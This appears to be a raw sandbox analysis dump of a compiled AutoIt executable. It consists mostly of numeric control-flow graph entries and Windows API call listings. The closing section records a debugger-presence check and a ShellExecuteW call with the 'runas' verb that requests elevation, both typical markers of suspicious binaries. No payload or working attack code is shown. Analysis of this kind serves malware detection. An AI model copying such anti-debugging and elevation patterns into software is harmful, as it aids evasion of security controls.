105775 fa8b28 58 API calls __getptd_noexit 105700->105775 105765 fb5c6b 105702->105765 105705 fada21 105778 fa8b28 58 API calls __getptd_noexit 105705->105778 105707 fad9cd 105776 fa8db6 9 API calls __woutput_l 105707->105776 105708 fada5f 105711 faddb8 105708->105711 105781 fa99ac 58 API calls 2 library calls 105708->105781 105713 fae14b WriteFile 105711->105713 105714 faddd6 105711->105714 105712 fada28 105779 fa8db6 9 API calls __woutput_l 105712->105779 105717 faddab GetLastError 105713->105717 105723 fadd78 105713->105723 105718 fadefa 105714->105718 105726 faddec 105714->105726 105717->105723 105729 fadfef 105718->105729 105731 fadf05 105718->105731 105719 fada8b GetConsoleMode 105719->105711 105721 fadaca 105719->105721 105720 fae184 105720->105692 105786 fa8b28 58 API calls __getptd_noexit 105720->105786 105721->105711 105724 fadada GetConsoleCP 105721->105724 105723->105692 105723->105720 105728 faded8 105723->105728 105724->105720 105750 fadb09 105724->105750 105725 fade5b WriteFile 105725->105717 105730 fade98 105725->105730 105726->105720 105726->105725 105727 fae1b2 105787 fa8af4 58 API calls __getptd_noexit 105727->105787 105733 fae17b 105728->105733 105734 fadee3 105728->105734 105729->105720 105735 fae064 WideCharToMultiByte 105729->105735 105730->105726 105736 fadebc 105730->105736 105731->105720 105737 fadf6a WriteFile 105731->105737 105785 fa8b07 58 API calls 3 library calls 105733->105785 105783 fa8b28 58 API calls __getptd_noexit 105734->105783 105735->105717 105746 fae0ab 105735->105746 105736->105723 105737->105717 105738 fadfb9 105737->105738 105738->105723 105738->105731 105738->105736 105741 fadee8 105784 fa8af4 58 API calls __getptd_noexit 105741->105784 105742 fae0b3 WriteFile 105743 fae106 GetLastError 105742->105743 105742->105746 105743->105746 105746->105723 105746->105729 105746->105736 105746->105742 105747 fb62ba 60 API calls __write_nolock 105747->105750 105748 fadbf2 WideCharToMultiByte 105748->105723 105749 fadc2d WriteFile 105748->105749 105749->105717 105752 fadc5f 105749->105752 105750->105723 105750->105747 105750->105748 105750->105752 105782 fa35f5 58 API calls __isleadbyte_l 105750->105782 105751 fb7a5e WriteConsoleW CreateFileW __putwch_nolock 105751->105752 105752->105717 105752->105723 105752->105750 105752->105751 105753 fadc87 WriteFile 105752->105753 105753->105717 105753->105752 105754->105660 105755->105676 105756->105664 105757->105678 105758->105677 105759->105676 105760->105664 105761->105672 105762->105676 105763->105687 105764->105683 105766 fb5c83 105765->105766 105767 fb5c76 105765->105767 105769 fb5c8f 105766->105769 105770 fa8b28 __woutput_l 58 API calls 105766->105770 105768 fa8b28 __woutput_l 58 API calls 105767->105768 105772 fb5c7b 105768->105772 105769->105708 105771 fb5cb0 105770->105771 105773 fa8db6 __woutput_l 9 API calls 105771->105773 105772->105708 105773->105772 105774->105700 105775->105707 105776->105692 105777->105705 105778->105712 105779->105692 105780->105702 105781->105719 105782->105750 105783->105741 105784->105692 105785->105692 105786->105727 105787->105692 105788->105622 105789->105624 105813 fad4c3 105790->105813 105792 fb0b41 105826 fad43d 59 API calls 2 library calls 105792->105826 105794 fb0aeb 105794->105792 105795 fb0b1f 105794->105795 105796 fad4c3 __commit 58 API calls 105794->105796 105795->105792 105797 fad4c3 __commit 58 API calls 105795->105797 105799 fb0b16 105796->105799 105800 fb0b2b CloseHandle 105797->105800 105798 fb0b49 105801 fb0b6b 105798->105801 105827 fa8b07 58 API calls 3 library calls 105798->105827 105802 fad4c3 __commit 58 API calls 105799->105802 105800->105792 105803 fb0b37 GetLastError 105800->105803 105801->105648 105802->105795 105803->105792 105805->105631 105806->105649 105807->105638 105808->105648 105809->105649 105810->105638 105811->105642 105812->105649 105814 fad4ce 105813->105814 105816 fad4e3 105813->105816 105828 fa8af4 58 API calls __getptd_noexit 105814->105828 105821 fad508 105816->105821 105830 fa8af4 58 API calls __getptd_noexit 105816->105830 105817 fad4d3 105829 fa8b28 58 API calls __getptd_noexit 105817->105829 105819 fad512 105831 fa8b28 58 API calls __getptd_noexit 105819->105831 105821->105794 105823 fad4db 105823->105794 105824 fad51a 105832 fa8db6 9 API calls __woutput_l 105824->105832 105826->105798 105827->105801 105828->105817 105829->105823 105830->105819 105831->105824 105832->105823 105834 fb1940 __write_nolock 105833->105834 105835 fa079e GetLongPathNameW 105834->105835 105836 f87bcc 59 API calls 105835->105836 105837 f872bd 105836->105837 105838 f8700b 105837->105838 105839 f87667 59 API calls 105838->105839 105840 f8701d 105839->105840 105841 f84750 60 API calls 105840->105841 105842 f87028 105841->105842 105843 f87033 105842->105843 105844 fbe885 105842->105844 105846 f83f74 59 API calls 105843->105846 105848 fbe89f 105844->105848 105891 f87908 61 API calls 105844->105891 105847 f8703f 105846->105847 105885 f834c2 105847->105885 105850 f87052 Mailbox 105850->105047 105852 f84ddd 136 API calls 105851->105852 105853 f8688f 105852->105853 105854 fbe031 105853->105854 105856 f84ddd 136 API calls 105853->105856 105855 fe955b 122 API calls 105854->105855 105857 fbe046 105855->105857 105858 f868a3 105856->105858 105860 fbe04a 105857->105860 105861 fbe067 105857->105861 105858->105854 105859 f868ab 105858->105859 105862 fbe052 105859->105862 105863 f868b7 105859->105863 105864 f84e4a 84 API calls 105860->105864 105865 fa0db6 Mailbox 59 API calls 105861->105865 105987 fe42f8 90 API calls _wprintf 105862->105987 105892 f86a8c 105863->105892 105864->105862 105884 fbe0ac Mailbox 105865->105884 105869 fbe060 105869->105861 105870 fbe260 105871 fa2d55 _free 58 API calls 105870->105871 105872 fbe268 105871->105872 105873 f84e4a 84 API calls 105872->105873 105878 fbe271 105873->105878 105877 fa2d55 _free 58 API calls 105877->105878 105878->105877 105879 f84e4a 84 API calls 105878->105879 105992 fdf7a1 89 API calls 4 library calls 105878->105992 105879->105878 105881 f87de1 59 API calls 105881->105884 105884->105870 105884->105878 105884->105881 105984 fdf73d 105884->105984 105988 fdf65e 61 API calls 2 library calls 105884->105988 105989 fe737f 59 API calls Mailbox 105884->105989 105990 f8750f 59 API calls 2 library calls 105884->105990 105991 f8735d 59 API calls Mailbox 105884->105991 105886 f834d4 105885->105886 105890 f834f3 _memmove 105885->105890 105888 fa0db6 Mailbox 59 API calls 105886->105888 105887 fa0db6 Mailbox 59 API calls 105889 f8350a 105887->105889 105888->105890 105889->105850 105890->105887 105891->105844 105893 fbe41e 105892->105893 105894 f86ab5 105892->105894 106065 fdf7a1 89 API calls 4 library calls 105893->106065 105998 f857a6 60 API calls Mailbox 105894->105998 105897 f86ad7 105999 f857f6 67 API calls 105897->105999 105898 fbe431 106066 fdf7a1 89 API calls 4 library calls 105898->106066 105900 f86aec 105900->105898 105902 f86af4 105900->105902 105904 f87667 59 API calls 105902->105904 105903 fbe44d 105906 f86b61 105903->105906 105905 f86b00 105904->105905 106000 fa0957 60 API calls __write_nolock 105905->106000 105908 f86b6f 105906->105908 105909 fbe460 105906->105909 105912 f87667 59 API calls 105908->105912 105911 f85c6f CloseHandle 105909->105911 105910 f86b0c 105913 f87667 59 API calls 105910->105913 105915 fbe46c 105911->105915 105916 f86b78 105912->105916 105914 f86b18 105913->105914 105917 f84750 60 API calls 105914->105917 105918 f84ddd 136 API calls 105915->105918 105919 f87667 59 API calls 105916->105919 105920 f86b26 105917->105920 105921 fbe488 105918->105921 105922 f86b81 105919->105922 106001 f85850 ReadFile SetFilePointerEx 105920->106001 105924 fbe4b1 105921->105924 105927 fe955b 122 API calls 105921->105927 106003 f8459b 105922->106003 106067 fdf7a1 89 API calls 4 library calls 105924->106067 105926 f86b52 106002 f85aee SetFilePointerEx SetFilePointerEx 105926->106002 105931 fbe4a4 105927->105931 105928 f86b98 105932 f87b2e 59 API calls 105928->105932 105933 fbe4cd 105931->105933 105934 fbe4ac 105931->105934 105935 f86ba9 SetCurrentDirectoryW 105932->105935 105936 f84e4a 84 API calls 105933->105936 105937 f84e4a 84 API calls 105934->105937 105941 f86bbc Mailbox 105935->105941 105939 fbe4d2 105936->105939 105937->105924 105938 f86d0c Mailbox 105993 f857d4 105938->105993 105940 fa0db6 Mailbox 59 API calls 105939->105940 105947 fbe506 105940->105947 105943 fa0db6 Mailbox 59 API calls 105941->105943 105945 f86bcf 105943->105945 105944 f83bbb 105944->104906 105944->104915 105946 f8522e 59 API calls 105945->105946 105976 f86bda Mailbox __wsetenvp 105946->105976 106068 f8750f 59 API calls 2 library calls 105947->106068 105949 f86ce7 106061 f85c6f 105949->106061 105952 fbe740 106073 fe72df 59 API calls Mailbox 105952->106073 105953 f86cf3 SetCurrentDirectoryW 105953->105938 105956 fbe762 106074 fffbce 59 API calls 2 library calls 105956->106074 105959 fbe76f 105961 fa2d55 _free 58 API calls 105959->105961 105960 fbe7d9 106077 fdf7a1 89 API calls 4 library calls 105960->106077 105961->105938 105965 fbe7f2 105965->105949 105967 fbe7d1 106076 fdf5f7 59 API calls 4 library calls 105967->106076 105970 f87de1 59 API calls 105970->105976 105971 fdf73d 59 API calls 105981 fbe54f Mailbox 105971->105981 105973 f87de1 59 API calls 105973->105981 105976->105949 105976->105960 105976->105967 105976->105970 106054 f8586d 67 API calls _wcscpy 105976->106054 106055 f86f5d GetStringTypeW 105976->106055 106056 f86ecc 60 API calls __wcsnicmp 105976->106056 106057 f86faa GetStringTypeW __wsetenvp 105976->106057 106058 fa363d GetStringTypeW _iswctype 105976->106058 106059 f868dc 165 API calls 3 library calls 105976->106059 106060 f87213 59 API calls Mailbox 105976->106060 105978 fbe792 106075 fdf7a1 89 API calls 4 library calls 105978->106075 105980 fbe7ab 105982 fa2d55 _free 58 API calls 105980->105982 105981->105952 105981->105971 105981->105973 105981->105978 106069 fdf65e 61 API calls 2 library calls 105981->106069 106070 fe737f 59 API calls Mailbox 105981->106070 106071 f8750f 59 API calls 2 library calls 105981->106071 106072 f87213 59 API calls Mailbox 105981->106072 105983 fbe4c8 105982->105983 105983->105938 105985 fa0db6 Mailbox 59 API calls 105984->105985 105986 fdf76d _memmove 105985->105986 105986->105884 105987->105869 105988->105884 105989->105884 105990->105884 105991->105884 105992->105878 105994 f85c6f CloseHandle 105993->105994 105995 f857dc Mailbox 105994->105995 105996 f85c6f CloseHandle 105995->105996 105997 f857eb 105996->105997 105997->105944 105998->105897 105999->105900 106000->105910 106001->105926 106002->105906 106004 f87667 59 API calls 106003->106004 106005 f845b1 106004->106005 106006 f87667 59 API calls 106005->106006 106007 f845b9 106006->106007 106008 f87667 59 API calls 106007->106008 106009 f845c1 106008->106009 106010 f87667 59 API calls 106009->106010 106011 f845c9 106010->106011 106012 f845fd 106011->106012 106013 fbd4d2 106011->106013 106014 f8784b 59 API calls 106012->106014 106015 f88047 59 API calls 106013->106015 106016 f8460b 106014->106016 106017 fbd4db 106015->106017 106018 f87d2c 59 API calls 106016->106018 106019 f87d8c 59 API calls 106017->106019 106020 f84615 106018->106020 106022 f84640 106019->106022 106021 f8784b 59 API calls 106020->106021 106020->106022 106025 f84636 106021->106025 106023 f84680 106022->106023 106026 f8465f 106022->106026 106036 fbd4fb 106022->106036 106024 f8784b 59 API calls 106023->106024 106027 f84691 106024->106027 106028 f87d2c 59 API calls 106025->106028 106030 f879f2 59 API calls 106026->106030 106031 f846a3 106027->106031 106034 f88047 59 API calls 106027->106034 106028->106022 106029 fbd5cb 106032 f87bcc 59 API calls 106029->106032 106033 f84669 106030->106033 106035 f846b3 106031->106035 106038 f88047 59 API calls 106031->106038 106049 fbd588 106032->106049 106033->106023 106037 f8784b 59 API calls 106033->106037 106034->106031 106040 f846ba 106035->106040 106041 f88047 59 API calls 106035->106041 106036->106029 106039 fbd5b4 106036->106039 106048 fbd532 106036->106048 106037->106023 106038->106035 106039->106029 106044 fbd59f 106039->106044 106042 f88047 59 API calls 106040->106042 106051 f846c1 Mailbox 106040->106051 106041->106040 106042->106051 106043 f879f2 59 API calls 106043->106049 106046 f87bcc 59 API calls 106044->106046 106045 fbd590 106047 f87bcc 59 API calls 106045->106047 106046->106049 106047->106049 106048->106045 106052 fbd57b 106048->106052 106049->106023 106049->106043 106078 f87924 59 API calls 2 library calls 106049->106078 106051->105928 106053 f87bcc 59 API calls 106052->106053 106053->106049 106054->105976 106055->105976 106056->105976 106057->105976 106058->105976 106059->105976 106060->105976 106062 f85c88 106061->106062 106063 f85c79 106061->106063 106062->106063 106064 f85c8d CloseHandle 106062->106064 106063->105953 106064->106063 106065->105898 106066->105903 106067->105983 106068->105981 106069->105981 106070->105981 106071->105981 106072->105981 106073->105956 106074->105959 106075->105980 106076->105960 106077->105965 106078->106049 106080 f86ea9 106079->106080 106081 f86d95 106079->106081 106080->105053 106081->106080 106082 fa0db6 Mailbox 59 API calls 106081->106082 106084 f86dbc 106082->106084 106083 fa0db6 Mailbox 59 API calls 106089 f86e31 106083->106089 106084->106083 106089->106080 106092 f86240 106089->106092 106117 f8735d 59 API calls Mailbox 106089->106117 106118 fd6553 59 API calls Mailbox 106089->106118 106119 f8750f 59 API calls 2 library calls 106089->106119 106090->105056 106091->105058 106093 f87a16 59 API calls 106092->106093 106111 f86265 106093->106111 106094 f8646a 106122 f8750f 59 API calls 2 library calls 106094->106122 106096 f86484 Mailbox 106096->106089 106099 fbdff6 106125 fdf8aa 91 API calls 4 library calls 106099->106125 106100 f87d8c 59 API calls 106100->106111 106101 f8750f 59 API calls 106101->106111 106105 fbe004 106126 f8750f 59 API calls 2 library calls 106105->106126 106107 fbe01a 106107->106096 106108 f86799 _memmove 106127 fdf8aa 91 API calls 4 library calls 106108->106127 106109 fbdf92 106110 f88029 59 API calls 106109->106110 106112 fbdf9d 106110->106112 106111->106094 106111->106099 106111->106100 106111->106101 106111->106108 106111->106109 106114 f87e4f 59 API calls 106111->106114 106120 f85f6c 60 API calls 106111->106120 106121 f85d41 59 API calls Mailbox 106111->106121 106123 f85e72 60 API calls 106111->106123 106124 f87924 59 API calls 2 library calls 106111->106124 106116 fa0db6 Mailbox 59 API calls 106112->106116 106115 f8643b CharUpperBuffW 106114->106115 106115->106111 106116->106108 106117->106089 106118->106089 106119->106089 106120->106111 106121->106111 106122->106096 106123->106111 106124->106111 106125->106105 106126->106107 106127->106096 106128->105071 106129->105072 106131 f8e6d5 106130->106131 106132 fc3aa9 106131->106132 106133 f8e73f 106131->106133 106144 f8e799 106131->106144 106134 f89ea0 341 API calls 106132->106134 106138 f87667 59 API calls 106133->106138 106133->106144 106135 fc3abe 106134->106135 106160 f8e970 Mailbox 106135->106160 106204 fe9e4a 89 API calls 4 library calls 106135->106204 106136 f87667 59 API calls 106136->106144 106140 fc3b04 106138->106140 106139 fa2d40 __cinit 67 API calls 106139->106144 106142 fa2d40 __cinit 67 API calls 106140->106142 106141 fc3b26 106141->105150 106142->106144 106143 f884c0 69 API calls 106143->106160 106144->106136 106144->106139 106144->106141 106146 f8e95a 106144->106146 106144->106160 106145 f89ea0 341 API calls 106145->106160 106146->106160 106205 fe9e4a 89 API calls 4 library calls 106146->106205 106148 f88d40 59 API calls 106148->106160 106155 fe9e4a 89 API calls 106155->106160 106157 fc3e25 106157->105150 106158 f8f195 106209 fe9e4a 89 API calls 4 library calls 106158->106209 106159 f8ea78 106159->105150 106160->106143 106160->106145 106160->106148 106160->106155 106160->106158 106160->106159 106203 f87f77 59 API calls 2 library calls 106160->106203 106206 fd6e8f 59 API calls 106160->106206 106207 ffc5c3 341 API calls 106160->106207 106208 ffb53c 341 API calls Mailbox 106160->106208 106210 f89c90 59 API calls Mailbox 106160->106210 106211 ff93c6 341 API calls Mailbox 106160->106211 106162 f8f4ba 106161->106162 106163 f8f650 106161->106163 106165 fc441e 106162->106165 106166 f8f4c6 106162->106166 106164 f87de1 59 API calls 106163->106164 106172 f8f58c Mailbox 106164->106172 106309 ffbc6b 341 API calls Mailbox 106165->106309 106307 f8f290 341 API calls 2 library calls 106166->106307 106169 fc442c 106173 f8f630 106169->106173 106310 fe9e4a 89 API calls 4 library calls 106169->106310 106171 f8f4fd 106171->106169 106171->106172 106171->106173 106176 f84e4a 84 API calls 106172->106176 106212 fecb7a 106172->106212 106292 ff445a 106172->106292 106301 fe3c37 106172->106301 106304 ffdf37 106172->106304 106173->105150 106175 f8f5e3 106175->106173 106308 f89c90 59 API calls Mailbox 106175->106308 106176->106175 106181->105150 106182->105150 106183->105150 106184->105081 106185->105086 106186->105150 106187->105078 106188->105078 106189->105078 106190->105150 106191->105150 106192->105150 106193->105150 106194->105150 106195->105150 106196->105135 106197->105135 106198->105135 106199->105135 106200->105135 106201->105135 106202->105135 106203->106160 106204->106160 106205->106160 106206->106160 106207->106160 106208->106160 106209->106157 106210->106160 106211->106160 106213 f87667 59 API calls 106212->106213 106214 fecbaf 106213->106214 106215 f87667 59 API calls 106214->106215 106216 fecbb8 106215->106216 106217 fecbcc 106216->106217 106420 f89b3c 59 API calls 106216->106420 106219 f89837 84 API calls 106217->106219 106220 fecbe9 106219->106220 106221 feccea 106220->106221 106222 fecc0b 106220->106222 106291 fecd1a Mailbox 106220->106291 106224 f84ddd 136 API calls 106221->106224 106223 f89837 84 API calls 106222->106223 106225 fecc17 106223->106225 106226 feccfe 106224->106226 106227 f88047 59 API calls 106225->106227 106228 fecd16 106226->106228 106230 f84ddd 136 API calls 106226->106230 106229 fecc23 106227->106229 106231 f87667 59 API calls 106228->106231 106228->106291 106235 fecc69 106229->106235 106236 fecc37 106229->106236 106230->106228 106232 fecd4b 106231->106232 106233 f87667 59 API calls 106232->106233 106234 fecd54 106233->106234 106238 f87667 59 API calls 106234->106238 106237 f89837 84 API calls 106235->106237 106239 f88047 59 API calls 106236->106239 106240 fecc76 106237->106240 106241 fecd5d 106238->106241 106242 fecc47 106239->106242 106243 f88047 59 API calls 106240->106243 106244 f87667 59 API calls 106241->106244 106245 f87cab 59 API calls 106242->106245 106246 fecc82 106243->106246 106247 fecd66 106244->106247 106248 fecc51 106245->106248 106421 fe4a31 GetFileAttributesW 106246->106421 106250 f89837 84 API calls 106247->106250 106251 f89837 84 API calls 106248->106251 106253 fecd73 106250->106253 106254 fecc5d 106251->106254 106252 fecc8b 106255 fecc9e 106252->106255 106258 f879f2 59 API calls 106252->106258 106256 f8459b 59 API calls 106253->106256 106257 f87b2e 59 API calls 106254->106257 106260 f89837 84 API calls 106255->106260 106265 fecca4 106255->106265 106259 fecd8e 106256->106259 106257->106235 106258->106255 106261 f879f2 59 API calls 106259->106261 106262 fecccb 106260->106262 106263 fecd9d 106261->106263 106422 fe37ef 75 API calls Mailbox 106262->106422 106266 fecdd1 106263->106266 106268 f879f2 59 API calls 106263->106268 106265->106291 106267 f88047 59 API calls 106266->106267 106269 fecddf 106267->106269 106270 fecdae 106268->106270 106271 f87b2e 59 API calls 106269->106271 106270->106266 106272 f87bcc 59 API calls 106270->106272 106273 fecded 106271->106273 106274 fecdc3 106272->106274 106275 f87b2e 59 API calls 106273->106275 106276 f87bcc 59 API calls 106274->106276 106277 fecdfb 106275->106277 106276->106266 106278 f87b2e 59 API calls 106277->106278 106279 fece09 106278->106279 106280 f89837 84 API calls 106279->106280 106281 fece15 106280->106281 106311 fe4071 106281->106311 106283 fece26 106284 fe3c37 3 API calls 106283->106284 106285 fece30 106284->106285 106286 f89837 84 API calls 106285->106286 106290 fece61 106285->106290 106287 fece4e 106286->106287 106365 fe9155 106287->106365 106289 f84e4a 84 API calls 106289->106291 106290->106289 106291->106175 106293 f89837 84 API calls 106292->106293 106294 ff4494 106293->106294 106295 f86240 94 API calls 106294->106295 106296 ff44a4 106295->106296 106297 f89ea0 341 API calls 106296->106297 106298 ff44c9 106296->106298 106297->106298 106300 ff44cd 106298->106300 106463 f89a98 59 API calls Mailbox 106298->106463 106300->106175 106464 fe445a GetFileAttributesW 106301->106464 106305 ffcadd 130 API calls 106304->106305 106306 ffdf47 106305->106306 106306->106175 106307->106171 106308->106175 106309->106169 106310->106173 106312 fe408d 106311->106312 106313 fe4092 106312->106313 106314 fe40a0 106312->106314 106315 f88047 59 API calls 106313->106315 106316 f87667 59 API calls 106314->106316 106317 fe409b Mailbox 106315->106317 106318 fe40a8 106316->106318 106317->106283 106319 f87667 59 API calls 106318->106319 106320 fe40b0 106319->106320 106321 f87667 59 API calls 106320->106321 106322 fe40bb 106321->106322 106323 f87667 59 API calls 106322->106323 106324 fe40c3 106323->106324 106325 f87667 59 API calls 106324->106325 106326 fe40cb 106325->106326 106327 f87667 59 API calls 106326->106327 106328 fe40d3 106327->106328 106329 f87667 59 API calls 106328->106329 106330 fe40db 106329->106330 106331 f87667 59 API calls 106330->106331 106332 fe40e3 106331->106332 106333 f8459b 59 API calls 106332->106333 106334 fe40fa 106333->106334 106335 f8459b 59 API calls 106334->106335 106336 fe4113 106335->106336 106337 f879f2 59 API calls 106336->106337 106338 fe411f 106337->106338 106339 fe4132 106338->106339 106340 f87d2c 59 API calls 106338->106340 106341 f879f2 59 API calls 106339->106341 106340->106339 106342 fe413b 106341->106342 106343 fe414b 106342->106343 106344 f87d2c 59 API calls 106342->106344 106345 f88047 59 API calls 106343->106345 106344->106343 106346 fe4157 106345->106346 106347 f87b2e 59 API calls 106346->106347 106348 fe4163 106347->106348 106423 fe4223 59 API calls 106348->106423 106350 fe4172 106424 fe4223 59 API calls 106350->106424 106352 fe4185 106353 f879f2 59 API calls 106352->106353 106354 fe418f 106353->106354 106355 fe41a6 106354->106355 106356 fe4194 106354->106356 106357 f879f2 59 API calls 106355->106357 106358 f87cab 59 API calls 106356->106358 106359 fe41af 106357->106359 106360 fe41a1 106358->106360 106366 fe9162 __write_nolock 106365->106366 106367 fa0db6 Mailbox 59 API calls 106366->106367 106368 fe91bf 106367->106368 106369 f8522e 59 API calls 106368->106369 106370 fe91c9 106369->106370 106371 fe8f5f GetSystemTimeAsFileTime 106370->106371 106372 fe91d4 106371->106372 106373 f84ee5 85 API calls 106372->106373 106374 fe91e7 _wcscmp 106373->106374 106375 fe920b 106374->106375 106376 fe92b8 106374->106376 106377 fe9734 96 API calls 106375->106377 106378 fe9734 96 API calls 106376->106378 106379 fe9210 106377->106379 106393 fe9284 _wcscat 106378->106393 106382 fe92c1 106379->106382 106442 fa40fb 58 API calls __wsplitpath_helper 106379->106442 106381 f84f0b 74 API calls 106383 fe92dd 106381->106383 106382->106290 106384 f84f0b 74 API calls 106383->106384 106386 fe92ed 106384->106386 106385 fe9239 _wcscat _wcscpy 106443 fa40fb 58 API calls __wsplitpath_helper 106385->106443 106387 f84f0b 74 API calls 106386->106387 106389 fe9308 106387->106389 106390 f84f0b 74 API calls 106389->106390 106391 fe9318 106390->106391 106392 f84f0b 74 API calls 106391->106392 106394 fe9333 106392->106394 106393->106381 106393->106382 106395 f84f0b 74 API calls 106394->106395 106396 fe9343 106395->106396 106397 f84f0b 74 API calls 106396->106397 106398 fe9353 106397->106398 106399 f84f0b 74 API calls 106398->106399 106400 fe9363 106399->106400 106425 fe98e3 GetTempPathW GetTempFileNameW 106400->106425 106402 fe936f 106403 fa525b 115 API calls 106402->106403 106420->106217 106421->106252 106422->106265 106423->106350 106424->106352 106425->106402 106442->106385 106443->106393 106463->106300 106465 fe3c3e 106464->106465 106466 fe4475 FindFirstFileW 106464->106466 106465->106175 106466->106465 106467 fe448a FindClose 106466->106467 106467->106465 106468 f81055 106473 f82649 106468->106473 106471 fa2d40 __cinit 67 API calls 106472 f81064 106471->106472 106474 f87667 59 API calls 106473->106474 106475 f826b7 106474->106475 106480 f83582 106475->106480 106478 f82754 106479 f8105a 106478->106479 106483 f83416 59 API calls 2 library calls 106478->106483 106479->106471 106484 f835b0 106480->106484 106483->106478 106485 f835bd 106484->106485 106486 f835a1 106484->106486 106485->106486 106487 f835c4 RegOpenKeyExW 106485->106487 106486->106478 106487->106486 106488 f835de RegQueryValueExW 106487->106488 106489 f83614 RegCloseKey 106488->106489 106490 f835ff 106488->106490 106489->106486 106490->106489 106491 f81066 106496 f8f76f 106491->106496 106493 f8106c 106494 fa2d40 __cinit 67 API calls 106493->106494 106495 f81076 106494->106495 106497 f8f790 106496->106497 106529 f9ff03 106497->106529 106501 f8f7d7 106502 f87667 59 API calls 106501->106502 106503 f8f7e1 106502->106503 106504 f87667 59 API calls 106503->106504 106505 f8f7eb 106504->106505 106506 f87667 59 API calls 106505->106506 106507 f8f7f5 106506->106507 106508 f87667 59 API calls 106507->106508 106509 f8f833 106508->106509 106510 f87667 59 API calls 106509->106510 106511 f8f8fe 106510->106511 106539 f95f87 106511->106539 106515 f8f930 106516 f87667 59 API calls 106515->106516 106517 f8f93a 106516->106517 106567 f9fd9e 106517->106567 106519 f8f981 106520 f8f991 GetStdHandle 106519->106520 106521 f8f9dd 106520->106521 106522 fc45ab 106520->106522 106523 f8f9e5 OleInitialize 106521->106523 106522->106521 106524 fc45b4 106522->106524 106523->106493 106574 fe6b38 64 API calls Mailbox 106524->106574 106526 fc45bb 106575 fe7207 CreateThread 106526->106575 106528 fc45c7 CloseHandle 106528->106523 106576 f9ffdc 106529->106576 106532 f9ffdc 59 API calls 106533 f9ff45 106532->106533 106534 f87667 59 API calls 106533->106534 106535 f9ff51 106534->106535 106536 f87bcc 59 API calls 106535->106536 106537 f8f796 106536->106537 106538 fa0162 6 API calls 106537->106538 106538->106501 106540 f87667 59 API calls 106539->106540 106541 f95f97 106540->106541 106542 f87667 59 API calls 106541->106542 106543 f95f9f 106542->106543 106583 f95a9d 106543->106583 106546 f95a9d 59 API calls 106547 f95faf 106546->106547 106548 f87667 59 API calls 106547->106548 106549 f95fba 106548->106549 106550 fa0db6 Mailbox 59 API calls 106549->106550 106551 f8f908 106550->106551 106552 f960f9 106551->106552 106553 f96107 106552->106553 106554 f87667 59 API calls 106553->106554 106555 f96112 106554->106555 106556 f87667 59 API calls 106555->106556 106557 f9611d 106556->106557 106558 f87667 59 API calls 106557->106558 106559 f96128 106558->106559 106560 f87667 59 API calls 106559->106560 106561 f96133 106560->106561 106562 f95a9d 59 API calls 106561->106562 106563 f9613e 106562->106563 106564 fa0db6 Mailbox 59 API calls 106563->106564 106565 f96145 RegisterWindowMessageW 106564->106565 106565->106515 106568 fd576f 106567->106568 106569 f9fdae 106567->106569 106586 fe9ae7 60 API calls 106568->106586 106571 fa0db6 Mailbox 59 API calls 106569->106571 106573 f9fdb6 106571->106573 106572 fd577a 106573->106519 106574->106526 106575->106528 106587 fe71ed 65 API calls 106575->106587 106577 f87667 59 API calls 106576->106577 106578 f9ffe7 106577->106578 106579 f87667 59 API calls 106578->106579 106580 f9ffef 106579->106580 106581 f87667 59 API calls 106580->106581 106582 f9ff3b 106581->106582 106582->106532 106584 f87667 59 API calls 106583->106584 106585 f95aa5 106584->106585 106585->106546 106586->106572 106588 f81016 106593 f84974 106588->106593 106591 fa2d40 __cinit 67 API calls 106592 f81025 106591->106592 106594 fa0db6 Mailbox 59 API calls 106593->106594 106595 f8497c 106594->106595 106597 f8101b 106595->106597 106600 f84936 106595->106600 106597->106591 106601 f8493f 106600->106601 106602 f84951 106600->106602 106603 fa2d40 __cinit 67 API calls 106601->106603 106604 f849a0 106602->106604 106603->106602 106605 f87667 59 API calls 106604->106605 106606 f849b8 GetVersionExW 106605->106606 106607 f87bcc 59 API calls 106606->106607 106608 f849fb 106607->106608 106609 f87d2c 59 API calls 106608->106609 106618 f84a28 106608->106618 106610 f84a1c 106609->106610 106611 f87726 59 API calls 106610->106611 106611->106618 106612 f84a93 GetCurrentProcess IsWow64Process 106613 f84aac 106612->106613 106615 f84b2b GetSystemInfo 106613->106615 106616 f84ac2 106613->106616 106614 fbd864 106617 f84af8 106615->106617 106628 f84b37 106616->106628 106617->106597 106618->106612 106618->106614 106621 f84b1f GetSystemInfo 106624 f84ae9 106621->106624 106622 f84ad4 106623 f84b37 2 API calls 106622->106623 106625 f84adc GetNativeSystemInfo 106623->106625 106624->106617 106626 f84aef FreeLibrary 106624->106626 106625->106624 106626->106617 106629 f84ad0 106628->106629 106630 f84b40 LoadLibraryA 106628->106630 106629->106621 106629->106622 106630->106629 106631 f84b51 GetProcAddress 106630->106631 106631->106629

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B68
                                                • IsDebuggerPresent.KERNEL32 ref: 00F83B7A
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BEB
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                  • Part of subcall function 00F9092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83C14,010452F8,?,?,?), ref: 00F9096E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C6F
                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01037770,00000010), ref: 00FBD281
                                                • SetCurrentDirectoryW.KERNEL32(?,010452F8,?,?,?), ref: 00FBD2B9
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01034260,010452F8,?,?,?), ref: 00FBD33F
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FBD346
                                                  • Part of subcall function 00F83A46: GetSysColorBrush.USER32(0000000F), ref: 00F83A50
                                                  • Part of subcall function 00F83A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F83A5F
                                                  • Part of subcall function 00F83A46: LoadIconW.USER32(00000063), ref: 00F83A76
                                                  • Part of subcall function 00F83A46: LoadIconW.USER32(000000A4), ref: 00F83A88
                                                  • Part of subcall function 00F83A46: LoadIconW.USER32(000000A2), ref: 00F83A9A
                                                  • Part of subcall function 00F83A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AC0
                                                  • Part of subcall function 00F83A46: RegisterClassExW.USER32(?), ref: 00F83B16
